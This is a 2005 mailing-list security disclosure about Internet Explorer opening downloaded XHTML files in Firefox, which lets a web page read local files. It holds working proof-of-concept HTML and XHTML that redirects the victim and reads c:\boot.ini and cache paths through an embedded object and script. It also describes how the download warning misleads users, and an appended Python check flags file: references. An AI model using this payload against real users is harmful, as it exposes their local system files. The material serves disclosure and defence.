Message-ID: <BAY103-F3D7A91F60828F518CEE98B92B0@phx.gbl>
Date: Wed Apr 20 11:56:47 2005
From: bitlance_3 at hotmail.com (bitlance winter)
Subject: IE6 kicks Firefox's BUG : Local Information Disclosure
Hello, all.
IE6 kicks Firefox's BUG : Local Information Disclosure.
MIME types (commonly used on the web) determine what kind of content
is being sent down and give the browser an idea of how to parse, render
or otherwise deal with the content.
"application/zip", for example, is what's sent by the web server when
your browser accesses a ZIP file.
Directory-specific directive files such as .htaccess (as used by Apache,
for example) can be used to associate a particular MIME type with a given
file extension. For example, AddType application/xhtml+xml .xhtml will
configure Apache to send .xhtml files with application/xhtml+xml.
Internet Explorer's support of XHTML is incomplete. IE does not recognize
the xhtml MIME type - "application/xhtml+xml" which is required for true
XHTML compliance. So instead of rendering the page, a file download prompt
is presented to the user.
See also.
http://www.w3.org/TR/xhtml-media-types/
http://www.rfc-editor.org/rfc/rfc3236.txt
http://www.w3.org/People/mimasa/test/xhtml/media-types/
http://www.w3.org/People/mimasa/test/xhtml/media-types/results
Many people who want to read XHTML files install Firefox, which supports
XHTML files with MIME type - "application/xhtml+xml".
=========
STORY
=========
A man gets a new PC. OS is Windows XP SP2. Of course, he does not forget
WindowsUpdate. Now his machine is full-patched.
He installs Firefox, and sets Firefox as his default browser.
He wants to read XHTML files with "Content-Type: application/xhtml+xml".
Next day, he opens his Firefox Options, General, and clears the "Firefox
should check to see if it is the default browser when starting" check box.
Then he runs InternetExplorer and sets IE as his default browser again.
Now he opens the "My documents folder" window, choosing 'tools', then 'folder
options', 'filetypes' tab. He selects the filetype ".xhtml" and checks
it out. He finds that Firefox is still associated with the file type.
Yes. InternetExplorer can not open XHTML files, he thinks. O.K. when
he wants to read HTML files, IE opens the pages, and when he wants to
read XHTML files, Firefox opens the resources, COOL TIPS! he thinks.
=========
NOTE
=========
=== He is wrong. That is not COOL. ===
=========
STORY
=========
An attacker makes "bar.xhtml" (application/xhtml+xml) and "foo.html"
(text/html). Below are samples.
=== http://[malicious-site]/foo.html ===
The server gives Content-Type: text/html
========================================
<html>
<head>
<title>link to bar.xhtml</title>
<meta http-equiv="Refresh" content="1; URL=./bar.xhtml">
</head>
<body><a href="./bar.xhtml">Click Me.</a>
</body>
</html>
========================================
=== http://[malicious-site]/bar.xhtml ===
The server gives Content-Type: application/xhtml+xml
=========================================
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>IE - Firefox : Local Information Disclosure
</title>
<link rev="MADE" href="mailto:foo@...mple.com" />
<link rel="CONTENTS" href="./" />
<script type="text/javascript">
<![CDATA[
function Test(){
alert(local_file.document.firstChild.innerHTML);
}
window.onload=Test;
]]>
</script>
</head>
<body>
<h1>IE - Firefox : Local Information Disclosure</h1>
<h2>
boot.ini (Windows XP with Service Pack 2)
</h2>
<div>
<object data="file:///c:/boot.ini" type="text/plain" width="780"
height="130" name="local_file">
<p>display local_file</p>
</object>
</div>
<h2>
%USERPROFILE% Folder , Internet Cache Folder Random PATH for IE
</h2>
<div>
<script type="text/javascript">
<![CDATA[
var displocation=location.href;
var divElement=document.createElement('DIV');
divElement.setAttribute('style',
'color:black; background-color:BlanchedAlmond;');
document.body.appendChild(divElement);
var text=document.createTextNode(displocation);
divElement.appendChild(text);
]]>
</script>
</div>
</body>
</html>
=========================================
=========
NOTE
=========
See also.
[Bugzilla]
https://bugzilla.mozilla.org/show_bug.cgi?id=273419
https://bugzilla.mozilla.org/show_bug.cgi?id=230606
[Full-Disclosure ML]
Disclosure of local file content in Mozilla Firefox and Opera
http://lists.grok.org.uk/pipermail/full-disclosure/2004-December/
029833.html --- Giovanni Delvecchio
029846.html --- Juergen Schmidt
029856.html --- Thor Larholm
(Thanks a lot.)
=========
STORY
=========
One day, he uses IE, and visits the attacker's site.
As soon as he accesses the URL, http://[malicious-site]/foo.html,
he sees the "File Download" dialog box pop up.
===============================================
File Download - Security Warning
Do you want to run or save this file?
Name: bar.xhtml
Type: Unknown (file type), 1.23 KB
From: [malicious-site]
button: [Run] [Save] [Cancel]
check box: Always ask before opening this type of file
Blue Shield Icon :
While files from the Internet can be useful, this file type can
potentially harm your computer. If you do not trust the source, do not
run or save this software. What's the risk?
================================================
=========
NOTE
=========
Be careful about the checkbox and the blue shield icon. Not a yellow icon!!
=========
STORY
=========
He reads this dialog and thinks that ......
- O.K. It is NOT yellow Icon. if the file is bad one, Icon is yellow
- or red. Why blue Icon ? Because "bar.xhtml" is a XHTML file and
- it is safe. Type is unknown? Because IE does not recognize
- the xhtml MIME type. Good.
- Hmmmmm. "Always ask before opening this type of file" ?
- XHTML file is safe when Firefox opens it. I will clear the check
- box. That is all. O.K. Now I will click the "Run" button.
=========
NOTE
=========
When you first choose to download a file in Internet Explorer, you
receive a Confirm File Open dialog box. The "Always ask before opening
this type of file" check box in this dialog box is selected.
If you clear the "Always ask before opening this type of file" check
box, the registry entry for this setting is changed and you do not see
the Confirm File Open dialog box in subsequent download sessions.
Instead, Internet Explorer automatically opens files instead of
downloading them.
By the way, see also.
http://www.microsoft.com/technet/security/smallbusiness/prodtech/
windowsxp/iesecxp.mspx
[quoted]
Heed any warnings. When a Web site attempts to download a file to your
computer, Internet Explorer displays a message about saving, running,
or installing the file. If the message contains a yellow caution icon,
then the file has been identified as one that could pose a risk.
[/quoted]
What about the blue icon? Is it safe? ;-)
In this story, 'HE' knows that yellow or red is a dangerous icon.
At last he clicks the 'Run' button.
=========
STORY
=========
Firefox runs and displays http://[malicious-site]/bar.xhtml
Files of this XHTML type are automatically placed
=== in the Temporary Internet Files folder ====
and opened by the program that is associated with the file type.
Then his local machine information is disclosed via javascript.
boot.ini
%USERPROFILE%
Internet Cache Folder Random PATH for IE
and so on E.T.C.
He is very surprised.
His name is bitlance winter.... ;-<
=========
NOTE
=========
This is a bad behavior of InternetExplorer.
"Files of the type are automatically placed
=== in the Temporary Internet Files folder ====
and opened by the program that is associated with the file type."
This is a bad behavior of InternetExplorer, too.
If he does not clear the checkbox "Always..." when he clicks the
"Run" button, files of the type are placed
=== in the Temporary Internet Files folder ====
and opened by the program that is associated with the file type.
Firefox ? uhhhmmmmmm .
Opera is FIXED, perhaps.
Tested on
WindowsXP SP2
InternetExplorer6 SP2 full-patched (Japanese version)
- Version 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
Firefox 1.0.3 (en-US)
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7)
- Gecko/20050414 Firefox/1.0.3
Sorry too bad English.
Thank you for your reading this true story.
Best Regards.
--
bitlance winter
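
Added example, not part of the original post: a content check that a web proxy or gateway could run on markup fetched from an http(s) origin, flagging URL-bearing attributes that point at file: resources, as the object element in the bar.xhtml listing above does. The names `scan`, `url_scheme`, `LocalRefScanner`, the attribute set and the host `gateway-test.example` are assumptions made for this sketch, and the sample markup is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that can carry a URL the browser will fetch or navigate to.
URL_ATTRS = {"data", "src", "href", "codebase", "action"}

def url_scheme(value):
    """Lower-cased scheme of a URL after removing the whitespace browsers ignore."""
    cleaned = "".join(ch for ch in value if ch not in "\t\r\n").strip()
    try:
        return urlsplit(cleaned).scheme
    except ValueError:          # malformed host part: treat as having no scheme
        return ""

class LocalRefScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]     # line on which the tag starts
        for name, value in attrs:
            if name in URL_ATTRS and value and url_scheme(value) == "file":
                self.findings.append((line, tag, name, value.strip()))

def scan(markup, origin_url):
    """Return (line, tag, attribute, url) for each file: reference in remote markup."""
    if url_scheme(origin_url) not in ("http", "https"):
        return []               # a page already opened from disk is out of scope
    scanner = LocalRefScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

# Constructed sample, modelled on the bar.xhtml listing in the post.
SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>constructed sample</title><link rel="CONTENTS" href="./" /></head>
<body>
<object data="file:///c:/boot.ini" type="text/plain" name="local_file">
<p>display local_file</p>
</object>
<object data=" FILE:///C:/boot.ini" type="text/plain"></object>
<a href="http://example.com/file:///not-local">remote link</a>
</body>
</html>
"""

if __name__ == "__main__":
    print(scan(SAMPLE, "http://gateway-test.example/bar.xhtml"))
```

The check matters at the gateway because, as the post describes, the downloaded copy is later opened from the Temporary Internet Files folder, where it is no longer a remote page.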